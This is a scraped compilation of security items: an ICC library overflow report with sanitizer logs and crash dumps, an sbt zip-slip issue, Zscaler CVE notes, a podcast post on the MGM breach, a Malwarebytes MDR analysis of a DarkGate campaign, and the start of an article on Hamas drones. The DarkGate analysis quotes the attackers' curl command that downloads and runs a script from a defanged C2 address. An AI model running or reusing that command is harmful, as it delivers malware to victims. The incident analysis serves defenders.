In International Color Consortium DemoIccMAX 79ecb74, there is an out-of-bounds read in the CIccPRMG::GetChroma function in IccProfLib/IccPrmg.cpp in libSampleICC.a.

**Stack Buffer & Global Overflow Patches by @h02332 for DemoICCMax****Summary**

There is a stack buffer overflow at the icFixXml function and there is a global buffer overflow in the CIccPRMG::GetChroma function.

**Bug 1**

There is a stack buffer overflow at the icFixXml function, which is defined in IccUtilXml.cpp at line 330. The overflow occurs on a variable named 'fix', which is defined in IccTagXml.cpp at line 337.

    Error Details:
    Error Type: Stack buffer overflow.
    File: IccUtilXml.cpp
    Function: icFixXml
    Line: 330
    Variable Affected: 'fix' (defined in IccTagXml.cpp at line 337)
    Memory Affected: Address 0x7ff7b129ad20
    

**PoC**

     ./iccToXml ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc new.xml
    iccToXml(12862,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    
    ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ff7b129ad20 at pc 0x00010f569ed9 bp 0x7ff7b129ab70 sp 0x7ff7b129ab68
    WRITE of size 1 at 0x7ff7b129ad20 thread T0
        #0 0x10f569ed8 in icFixXml(char*, char const*) IccUtilXml.cpp:330
        #1 0x10f4ff381 in CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccTagXml.cpp:353
        #2 0x10f4eb22a in CIccProfileXml::ToXmlWithBlanks(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccProfileXml.cpp:264
        #3 0x10f4e632c in CIccProfileXml::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccProfileXml.cpp:79
        #4 0x10ec6821f in main IccToXml.cpp:38
        #5 0x7ff80dee53a5 in start+0x795 (dyld:x86_64+0xfffffffffff5c3a5)
    
    Address 0x7ff7b129ad20 is located in stack of thread T0 at offset 288 in frame
        #0 0x10f4fed5f in CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccTagXml.cpp:336
    
      This frame has 7 object(s):
        [32, 288) 'fix' (line 337) <== Memory access at offset 288 overflows this variable
        [352, 608) 'buf' (line 338)
        [672, 928) 'data' (line 339)
        [992, 1016) 'datastr' (line 340)
        [1056, 1080) 'agg.tmp'
        [1120, 1144) 'ref.tmp' (line 351)
        [1184, 1208) 'ref.tmp45' (line 360)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow IccUtilXml.cpp:330 in icFixXml(char*, char const*)
    Shadow bytes around the buggy address:
      0x7ff7b129aa80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ab00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ab80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ac00: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ac80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x7ff7b129ad00: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00 00 00
      0x7ff7b129ad80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ae00: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2
      0x7ff7b129ae80: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129af00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129af80: 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 f2
    

**Expected Output**

    ./iccToXml ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc new.xml
    XML successfully created
    

**Bug 2**

There is a global buffer overflow, that can potentially be exploited to execute arbitrary code or lead to undefined behavior.

    Error Details:
    Error Type: Global buffer overflow.
    File: IccPrmg.cpp
    Function: CIccPRMG::GetChroma
    Line: 163
    Affected Variable: 'icPRMG_Chroma' defined in IccPrmg.cpp
    Memory Affected: Address 0x000103847bf0
    

**PoC**

    ./iccRoundTrip ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc
    iccRoundTrip(12888,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    =================================================================
    ==12888==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000103847bf0 at pc 0x00010365ce45 bp 0x7ff7bd5f1a80 sp 0x7ff7bd5f1a78
    READ of size 4 at 0x000103847bf0 thread T0
        #0 0x10365ce44 in CIccPRMG::GetChroma(float, float) IccPrmg.cpp:163
        #1 0x10365cefd in CIccPRMG::InGamut(float, float, float) IccPrmg.cpp:170
        #2 0x10365d151 in CIccPRMG::InGamut(float*) IccPrmg.cpp:183
        #3 0x10365de40 in CIccPRMG::EvaluateProfile(CIccProfile*, icRenderingIntent, icXformInterp, bool) IccPrmg.cpp:240
        #4 0x10365ea4e in CIccPRMG::EvaluateProfile(char const*, icRenderingIntent, icXformInterp, bool) IccPrmg.cpp:288
        #5 0x102913176 in main iccRoundTrip.cpp:177
        #6 0x7ff80dee53a5 in start+0x795 (dyld:x86_64+0xfffffffffff5c3a5)
    
    0x000103847bf0 is located 0 bytes after global variable 'icPRMG_Chroma' defined in '/Users/xss/Downloads/DemoIccMAX-master/IccProfLib/IccPrmg.cpp' (0x103847060) of size 2960
    SUMMARY: AddressSanitizer: global-buffer-overflow IccPrmg.cpp:163 in CIccPRMG::GetChroma(float, float)
    Shadow bytes around the buggy address:
      0x000103847900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x000103847b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]f9
      0x000103847c00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847c80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847d00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847d80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847e00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    

**Expected Output**

    ./iccRoundTrip ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc
    iccRoundTrip(29379,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    Profile:          '/Users/xss/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc'
    Rendering Intent: Relative Colorimetric
    Specified Gamut:  Not Specified
    
    Round Trip 1
    ------------
    Min DeltaE:        0.00
    Mean DeltaE:       1.46
    Max DeltaE:        7.05
    
    Max L, a, b:   32.481213, 7.808893, 7.558380
    
    Round Trip 2
    ------------
    Min DeltaE:        0.00
    Mean DeltaE:       0.64
    Max DeltaE:        2.81
    
    Max L, a, b:   39.559242, 7.503039, -29.157310
    
    PRMG Interoperability - Round Trip Results
    ------------------------------------------------------
    DE <= 1.0 (   25388):  12.6%
    DE <= 2.0 (   33627):  16.7%
    DE <= 3.0 (   36466):  18.1%
    DE <= 5.0 (   42342):  21.0%
    DE <=10.0 (   58679):  29.1%
    Total     (  201613)
    

**Build**

    cmake -DCMAKE_INSTALL_PREFIX=$HOME/.local -DCMAKE_BUILD_TYPE=Debug -DCMAKE_CXX_FLAGS="-g -fsanitize=address -fno-omit-frame-pointer -Wall -std=c++17" ../Build/Cmake
    make
    

**Testing****OS**

    ProductName:		macOS
    ProductVersion:		14.0
    BuildVersion:		23A344
    

**Platform****Data**

Various inputs from CVE-2022-26730 and CVE-2023-32443 were used as PoC's

**Crash Reports****icFixXml(char\*, char const\*) + 410**

    Crashed Thread:        0  Dispatch queue: com.apple.main-thread
    
    Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
    Exception Codes:       KERN_INVALID_ADDRESS at 0x00007ff7b34d7000
    Exception Codes:       0x0000000000000001, 0x00007ff7b34d7000
    
    Termination Reason:    Namespace SIGNAL, Code 11 Segmentation fault: 11
    Terminating Process:   exc handler [9557]
    
    VM Region Info: 0x7ff7b34d7000 is not in any region.  Bytes after previous region: 1  Bytes before following region: 1519771648
          REGION TYPE                    START - END         [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
          Stack                    7ff7b2cd7000-7ff7b34d7000 [ 8192K] rw-/rwx SM=SHM  thread 0
    --->  GAP OF 0x5a95e000 BYTES
          unused __TEXT            7ff80de35000-7ff80de9d000 [  416K] r-x/r-x SM=COW  ...ed lib __TEXT
    
    Thread 0 Crashed::  Dispatch queue: com.apple.main-thread
    0   iccToXml                      	       0x10cadb4fa icFixXml(char*, char const*) + 410
    1   iccToXml                      	       0x10ca90027 CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) + 1431
    2   ???                           	0x6161616161616161 ???
    
    
    Thread 0 crashed with X86 Thread State (64-bit):
      rax: 0x00007ff7b34d7000  rbx: 0x000000010d301bf0  rcx: 0x0000000000000061  rdx: 0x00007ff7b34d7001
      rdi: 0x00007ff7b34d6e62  rsi: 0x00007ff7b34d6e68  rbp: 0x00007ff7b34d4310  rsp: 0x00007ff7b34d42b0
       r8: 0x0000000000000006   r9: 0x0000000000000000  r10: 0x000000000000000d  r11: 0x00007ff6a68674fd
      r12: 0x00007ff7b34d6600  r13: 0x0000000000000000  r14: 0x000000010ca2b650  r15: 0x00007ff7b34d6780
      rip: 0x000000010cadb4fa  rfl: 0x0000000000010202  cr2: 0x00007ff7b34d7000
      
    Logical CPU:     0
    Error Code:      0x00000006 (no mapping for user data write)
    Trap Number:     14
    
    Thread 0 instruction stream:
      44 19 00 e8 42 52 17 00-48 8b 75 e8 48 81 c6 04  D...BR..H.u.H...
      00 00 00 48 89 75 e8 48-89 45 a8 e9 42 00 00 00  ...H.u.H.E..B...
      48 8b 7d e8 48 8d 35 ac-44 19 00 e8 1a 52 17 00  H.}.H.5.D....R..
      48 8b 75 e8 48 81 c6 04-00 00 00 48 89 75 e8 48  H.u.H......H.u.H
      89 45 a0 e9 1a 00 00 00-48 8b 45 f0 8a 08 48 8b  .E......H.E...H.
      45 e8 48 89 c2 48 81 c2-01 00 00 00 48 89 55 e8  E.H..H......H.U.
     [88]08 48 8b 45 f0 48 05-01 00 00 00 48 89 45 f0  ..H.E.H.....H.E.	<==
      e9 69 fe ff ff 48 8b 45-e8 c6 00 00 48 8b 45 f8  .i...H.E....H.E.
      48 83 c4 60 5d c3 55 48-89 e5 48 83 ec 20 48 89  H..`].UH..H.. H.
      7d f8 48 89 75 f0 89 55-ec 48 8b 7d f8 48 8b 75  }.H.u..U.H.}.H.u
      f0 48 63 55 ec e8 ac f0-ff ff 48 8b 7d f8 88 45  .HcU......H.}..E
      eb e8 76 33 17 00 48 83-c4 20 5d c3 66 2e 0f 1f  ..v3..H.. ].f...
    

**CIccPRMG::GetChroma(float, float) + 1093 (IccPrmg.cpp:163)**

    Crashed Thread:        0  Dispatch queue: com.apple.main-thread
    
    Exception Type:        EXC_CRASH (SIGABRT)
    Exception Codes:       0x0000000000000000, 0x0000000000000000
    
    Termination Reason:    Namespace SIGNAL, Code 6 Abort trap: 6
    Terminating Process:   iccRoundTrip [12888]
    
    Application Specific Information:
    abort() called
    
    
    Thread 0 Crashed::  Dispatch queue: com.apple.main-thread
    0   libsystem_kernel.dylib        	    0x7ff80e2357a6 __pthread_kill + 10
    1   libsystem_pthread.dylib       	    0x7ff80e26df30 pthread_kill + 262
    2   libsystem_c.dylib             	    0x7ff80e18ca4d abort + 126
    3   libclang_rt.asan_osx_dynamic.dylib	       0x103b39516 __sanitizer::Abort() + 70
    4   libclang_rt.asan_osx_dynamic.dylib	       0x103b38c74 __sanitizer::Die() + 196
    5   libclang_rt.asan_osx_dynamic.dylib	       0x103b1cf2a __asan::ScopedInErrorReport::~ScopedInErrorReport() + 1178
    6   libclang_rt.asan_osx_dynamic.dylib	       0x103b1c1dd __asan::ReportGenericError(unsigned long, unsigned long, unsigned long, unsigned long, bool, unsigned long, unsigned int, bool) + 1773
    7   libclang_rt.asan_osx_dynamic.dylib	       0x103b1d448 __asan_report_load4 + 40
    8   libIccProfLib2.2.1.15.dylib   	       0x10365ce45 CIccPRMG::GetChroma(float, float) + 1093 (IccPrmg.cpp:163)
    9   libIccProfLib2.2.1.15.dylib   	       0x10365cefe CIccPRMG::InGamut(float, float, float) + 46 (IccPrmg.cpp:170)
    10  libIccProfLib2.2.1.15.dylib   	       0x10365d152 CIccPRMG::InGamut(float*) + 498 (IccPrmg.cpp:183)
    11  libIccProfLib2.2.1.15.dylib   	       0x10365de41 CIccPRMG::EvaluateProfile(CIccProfile*, icRenderingIntent, icXformInterp, bool) + 3169 (IccPrmg.cpp:240)
    12  libIccProfLib2.2.1.15.dylib   	       0x10365ea4f CIccPRMG::EvaluateProfile(char const*, icRenderingIntent, icXformInterp, bool) + 111 (IccPrmg.cpp:288)
    13  iccRoundTrip                  	       0x102913177 main + 1063 (iccRoundTrip.cpp:177)
    14  dyld                          	    0x7ff80dee53a6 start + 1942
    
    
    Thread 0 crashed with X86 Thread State (64-bit):
      rax: 0x0000000000000000  rbx: 0x0000000000000006  rcx: 0x00007ff7bd5f0ce8  rdx: 0x0000000000000000
      rdi: 0x0000000000000103  rsi: 0x0000000000000006  rbp: 0x00007ff7bd5f0d10  rsp: 0x00007ff7bd5f0ce8
       r8: 0x00001ffef7abe1a0   r9: 0x0000000000000000  r10: 0x0000000000000000  r11: 0x0000000000000246
      r12: 0x0000000000000103  r13: 0x2000000000000000  r14: 0x00007ff851846e80  r15: 0x0000000000000016
      rip: 0x00007ff80e2357a6  rfl: 0x0000000000000246  cr2: 0x0000000103ac44b0
      
    Logical CPU:     0
    Error Code:      0x02000148 
    Trap Number:     133
    
    
    Binary Images:
           0x1034bb000 -        0x103836fff libIccProfLib2.2.1.15.dylib (*) <f2dc6eae-a665-30af-bc63-7f6b8c876dad> /Users/USER/Downloads/*/libIccProfLib2.2.1.15.dylib
           0x103a37000 -        0x103b66fff libclang_rt.asan_osx_dynamic.dylib (*) <b5a35b2f-2e39-33dc-88c4-cd4db0ffc80b> /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/15.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib
           0x10290d000 -        0x102914fff iccRoundTrip (*) <a4db0180-b77f-39cc-bc80-71c3e8b6bbb3> /Users/USER/Downloads/*/iccRoundTrip
        0x7ff80e22d000 -     0x7ff80e267ff7 libsystem_kernel.dylib (*) <3690c1fc-599f-39ff-bbdb-85422e9a996c> /usr/lib/system/libsystem_kernel.dylib
        0x7ff80e268000 -     0x7ff80e273fff libsystem_pthread.dylib (*) <33c43114-85f0-3f32-86d7-8e6a2403d38c> /usr/lib/system/libsystem_pthread.dylib
        0x7ff80e10d000 -     0x7ff80e194fff libsystem_c.dylib (*) <3e9a5bfa-50c0-3a96-9291-4826c62d1182> /usr/lib/system/libsystem_c.dylib
        0x7ff80dedf000 -     0x7ff80df7b2ff dyld (*) <1289b60a-4980-342d-b1a4-250bbee392f1> /usr/lib/dyld
                   0x0 - 0xffffffffffffffff ??? (*) <00000000-0000-0000-0000-000000000000> ???
    
    

**Caveat: Opening Malicious ICC Color Profiles may result in Remote Code Execution in the context of the User**

CVE-2023-46603: Patches for stack buffer overflow at the icFixXml and global buffer overflow in the CIccPRMG::GetChroma functions by xsscx · Pull Request #53 · InternationalColorConsortium/DemoIccMAX

sbt is a build tool for Scala, Java, and others. Given a specially crafted zip or JAR file, `IO.unzip` allows writing of arbitrary file. This would have potential to overwrite `/root/.ssh/authorized_keys`. Within sbt's main code, `IO.unzip` is used in `pullRemoteCache` task and `Resolvers.remote`; however many projects use `IO.unzip(...)` directly to implement custom tasks. This vulnerability has been patched in version 1.9.7.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

xuwei-k opened this issue

Oct 15, 2023

· 1 comment · Fixed by #360

Closed

**zip slip vulnerability #358**

xuwei-k opened this issue

Oct 15, 2023

· 1 comment · Fixed by #360

**Comments**

*   https://security.snyk.io/research/zip-slip-vulnerability
*   https://github.com/snyk/zip-slip-vulnerability

How to fix? 🤔

*   change filter: NameFilter = AllPassFilter default param?
    *   def unzip(
        
        from: File,
        
        toDirectory: File,
        
        filter: NameFilter \= AllPassFilter,
        
        preserveLastModified: Boolean \= true
        
        ): Set\[File\] \=
        
        fileInputStream(from)(in \=> unzipStream(in, toDirectory, filter, preserveLastModified))
        
        def unzipURL(
        
        from: URL,
        
        toDirectory: File,
        
        filter: NameFilter \= AllPassFilter,
        
        preserveLastModified: Boolean \= true
        
        ): Set\[File\] \=
        
        urlInputStream(from)(in \=> unzipStream(in, toDirectory, filter, preserveLastModified))
        
        def unzipStream(
        
        from: InputStream,
        
        toDirectory: File,
        
        filter: NameFilter \= AllPassFilter,
        
*   add explicit filter param in user code?
    *   https://github.com/sbt/sbt/blob/da41144f37c32cbc0a64e3a91b505ce568869166/main/src/main/scala/sbt/Resolvers.scala#L44
    *   https://github.com/sbt/sbt/blob/da41144f37c32cbc0a64e3a91b505ce568869166/main/src/main/scala/sbt/internal/RemoteCache.scala#L416
*   another solutions?

eed3si9n added a commit to eed3si9n/io that referenced this issue

Oct 22, 2023

Fixes sbt#358
Ref codehaus-plexus/plexus-archiver 87

\*\*Problem\*\*
IO.unzip currently has zip-slip vulnerability, which can write arbitrary
files on the machine using specially crafted zip archive that holds path
traversal file names.

\*\*Solution\*\*
This replicates the fix originally sent to plex-archiver by Snyk Team.

eed3si9n added a commit to eed3si9n/io that referenced this issue

Oct 22, 2023

Fixes sbt#358
Ref codehaus-plexus/plexus-archiver 87

\*\*Problem\*\*
IO.unzip currently has zip-slip vulnerability, which can write arbitrary
files on the machine using specially crafted zip archive that holds path
traversal file names.

\*\*Solution\*\*
This replicates the fix originally sent to plex-archiver by Snyk Team.

2 participants

CVE-2023-46122: zip slip vulnerability · Issue #358 · sbt/io

The Zscaler Client Connector for macOS prior to 3.6 did not sufficiently validate RPC clients. A local adversary without sufficient privileges may be able to shutdown the Zscaler tunnel by exploiting a race condition.




CVE-2021-26737

Zscaler Client Connector for macOS prior to 3.7 had an unquoted search path vulnerability via the PATH variable. A local adversary may be able to execute code with root privileges.




CVE-2021-26738

Categories: Podcast
This week on the Lock and Code podcast, we speak with James Fair about the reluctance of some businesses to take cybersecurity seriously, even in the face of major attacks. 



(Read more...)




The post MGM attack is too late a wake-up call for businesses, says James Fair: Lock and Code S04E22 appeared first on Malwarebytes Labs.

_This week on the Lock and Code podcast..._

In September, the Las Vegas casino and hotel operator MGM Resorts became a trending topic on social media... but for all the wrong reasons. A TikTok user posted a video taken from inside the casino floor of the MGM Grand—the company's flagship hotel complex near the southern end of the Las Vegas strip—that didn't involve the whirring of slot machines or the sirens and buzzers of sweepstake earnings, but, instead, row after row of digital gambling machines with blank, non-functional screens. That same TikTok user commented on their own post that it wasn't just errored-out gambling machines that were causing problems—hotel guests were also having trouble getting into their own rooms.

As the user said online about their own experience: “Digital keys weren’t working. Had to get physical keys printed. They doubled booked our room so we walked in on someone.”

The trouble didn't stop there.

A separate photo shared online allegedly showed what looked like a Walkie-Talkie affixed to an elevator's handrail. Above the device was a piece of paper and a message written by hand: “For any elevator issues, please use the radio for support.”  

As the public would soon learn, MGM Resorts was the victim of a cyberattack, reportedly carried out by a group of criminals called Scattered Spider, which used the ALPHV ransomware.

It was one of the most publicly-exposed cyberattacks in recent history. But just a few days before the public saw the end result, the same cybercriminal group received a reported $15 million ransom payment from a separate victim situated just one and a half miles away.

On September 14, Caesar’s Entertainment reported in a filing with the US Securities and Exchange Commission that it, too, had suffered a cyber breach, and according to reporting from CNBC, it received a $30 million ransom demand, which it then negotiated down by about 50 percent.

The social media flurry, the TikTok videos, the comments and confusion from customers, the ghost-town casino floors captured in photographs—it all added up to something strange and new: Vegas was breached. 

But how? 

Though follow-on reporting suggests a particularly effective social engineering scam, the attacks themselves revealed a more troubling, potential vulnerability for businesses everywhere, which is that a company's budget—and its relative ability to devote resources to cybersecurity—doesn't necessarily insulate it from attacks. 

Today on the Lock and Code podcast with host David Ruiz, we speak with James Fair, senior vice president of IT Services at the managed IT services company Executech, about whether businesses are taking cybersecurity seriously enough, which industries he's seen pushback from for initial cybersecurity recommendations (and why), and the frustration of seeing some companies only take cybersecurity seriously after a major attack. 

> "How many do we have to see? MGM got hit, you guys. Some of the biggest targets out there—people who have more cybersecurity budget than people can imagine—got hit. So, what are you waiting for?"

Tune in today to listen to the full conversation.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

MGM attack is too late a wake-up call for businesses, says James Fair: Lock and Code S04E22

Categories: Business
On September 13th, 2023, the Malwarebytes MDR team spotted a new DarkGate malware campaign on a client network.  



(Read more...)




The post Battling a new DarkGate malware campaign with Malwarebytes MDR  appeared first on Malwarebytes Labs.

First publicly reported in 2018, DarkGate is a Windows-based malware with a wide-range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however, researchers at Trusec found evidence of a campaign using external Teams messages to deliver the DarkGate Loader.

On September 13th, 2023, the Malwarebytes MDR team spotted the same campaign on a client network.

**The Initial Incident**

The threat began as a phishing attempt via Microsoft Teams. The attackers sent a malicious ZIP file named "**C\_onfidential Sign\_ificant Company Changes.zip**" (the names may vary in different iterations of the attack).

Phishing message sent to targets via Microsoft Teams in the same DarkGate campaign. Image: Truesec

A number of employees clicked on this file believing it to be legitimate. Inside this ZIP file, however, were several malicious shortcut files, or LNK files, that were disguised as PDF documents.

The names of these LNK files included "**EMPLOYEES\_AFFECTED\_BY\_TRANSITION.PDF.LNK"** and "**COMPANY\_TRANSFORMATIONS.PDF.LNK**".

**The Malicious Command**

When employees clicked on these shortcuts, it triggered a malicious command line. Its purpose? To download and run a harmful script from a remote IP address. Fortunately, Malwarebytes EDR recognized this IP as a 'Known bad' destination and blocked it.

Multiple attempts to execute processes such as curl commands

**DarkGate Loader - The Culprit**

As the MDR team delved deeper into the incident, they discovered that this was not a random attack. It was connected to a known malware attack campaign using Teams phishing to install DarkGate Loader. The use of the curl command is to fetch and deposit malicious files onto the victim's machine:

"C:\\Windows\\System32\\cmd.exe" /k curl -# -o

"C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\Autoit3.exe" "

http://5\[.\]188\[.\]87\[.\]58:2351" -o

"C:\\Users\\\[Redacted\]AppData\\Local\\Temp\\btbgvbyy.au3"

"http://5\[.\]188\[.\]87\[.\]58:2351/msibtbgvbyy" "C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\Autoit3.exe"

"C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\btbgvbyy.au3" & exit

The malicious command attempts to run an AutoIt script (**btbgvbyy.au3**). Director of Threat Intelligence Jerome Segura notes the use of AutoIt, a legitimate scripting language, was already present in the very early versions of DarkGate.

Malwarebytes EDR recognizing suspicious AutoIt activity

Infected system exhibiting Indicators of Compromise (IOCs)

Recognizing the gravity of the situation, the team began collecting Indicators of Compromise (IOCs). This included hashes of the ZIP file, its contents, and samples of the malevolent script initiated by the shortcuts.

**Actions Taken**

Swift action was taken by isolating the affected machines. Although Malwarebytes EDR had already blocked the malicious IP, the MDR team took extra precautions, ensuring that no persistence mechanisms were present on the endpoints, which could have given attackers a backdoor to the system.

The MDR team also suggested blocking the download of files from external accounts in Microsoft Teams, which was the primary attack vector in this campaign.

**Lessons from the Incident**

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. If the infection had continued, the company could have faced potential data breaches, operational disruptions, financial losses, and more.

Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the DarkGate malware and safeguarded the customer’s digital environment against possible reinfection.

Learn more about how Malwarebytes MDR today can help secure your organization: https://try.malwarebytes.com/mdr-consultation-new/

Get a Malwarebytes MDR quote

Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:

Tracking down a trojan: An inside look at threat hunting in a corporate network

Understanding ransomware reinfection: An MDR case study

**Indicators of Compromise (IoC)****File Details:**

Filename: C\_onfidential Sign\_ificant Company Changes.zip

Reported At: 09/13/2023 9:57:56 AM

**Network Indicators:**

C2 IP Address: 5\[.\]188\[.\]87\[.\]58

**Malicious URLs:**

http://5\[.\]188\[.\]87\[.\]58:2351

http://5\[.\]188\[.\]87\[.\]58:2351/msibtbgvbyy

Battling a new DarkGate malware campaign with Malwarebytes MDR 

Categories: News
Tags: week

Tags:  security

Tags:  October 

Tags:  2023

A list of topics we covered in the week of October 16 to October 22 of 2023



(Read more...)




The post A week in security (October 16 - October 22) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

For Personal

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

See all

Company

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Rootkit Scanner

Trojan Scanner

Virus Scanner

Spyware Scanner  

Password Generator

Anti Ransomware Protection

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 16 - October 22)

Last week on Malwarebytes Labs: Stay safe! Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting...

October 30, 2023 - Last week on Malwarebytes Labs: Stay safe! Malwarebytes Managed Detection and Response (MDR) simply and effectively closes your security resources gap,...

October 29, 2023 - Most, if not all malvertising incidents result from a threat actor either injecting code within an existing ad, or intentionally creating...

October 27, 2023 - Octo Tempest is believed to be a group of native English speaking cybercriminals that uses social engineering campaigns to compromise organizations...

October 27, 2023 - Apple has released security updates for its phones, iPads, Macs, watches and TVs. Updates are available for these products: The important...

October 25, 2023 - VMWare has issued an update to address one out-of-bounds write and one information disclosure vulnerability in its server management software, vCenter Server. Since...

 A week in security (October 16 &#8211; October 22) 

Hamas has long touted its military drones, but little is known about the true scale of the threat. The answer may have consequences for people on both sides of the Israel-Gaza border.

When Hamas launched its attacks against Israel on October 7, it unleashed a flood of rockets as cover, while militants streamed through holes in the fence surrounding the Gaza strip. One particular clip released by Hamas, played on news stations the world over, provoked a particular bit of paranoia: video of balaclava-clad Hamas fighters standing in a desert landscape, launching a line of suicide drones.

Amid the terror and chaos, the video seems to underscore a long-held fear that Hamas—with the help of Iranian technology—had developed the ability to conduct air strikes on Israel. What’s more, these drones may prove more adept than Hamas’ supply of rockets at thwarting Israel’s sophisticated Iron Dome air defense system.

Hamas had been building this capacity for some time. In 2022, it touted its drone program with an ominous warning: Israel no longer had a monopoly on its skies. According to Hamas Telegram channels, roughly 40 suicide drones have been fired toward Israel since the war began earlier this month. Yet, besides some undated propaganda videos, there is scant evidence that these drones have actually been deployed against Israel—and, if they have, they don’t appear to have done much damage.

Drone warfare has dramatically altered the dynamics in a number of recent conflicts—from Ukraine to Nagorno-Karabakh to Yemen—but not in the war between Hamas and Israel.

Why? The answer could have significant implications for people on both sides of the Israel-Gaza border.

Since the early 2000s, Hamas, which was elected to lead Gaza’s government in 2006 and has held power ever since, has drastically scaled up its ability to hit targets inside Israel.

The earliest versions of its Qassam rocket were rudimentary: lightweight and capable of traveling just a few miles. In each successive generation of the missile, however, they became bigger, capable of flying farther, and equipped with larger warheads.

Over the past two decades, Hamas and Israel have engaged in a race—Hamas, to develop its offensive capabilities and extend its reach; and Israel, to frustrate those efforts as much as possible.

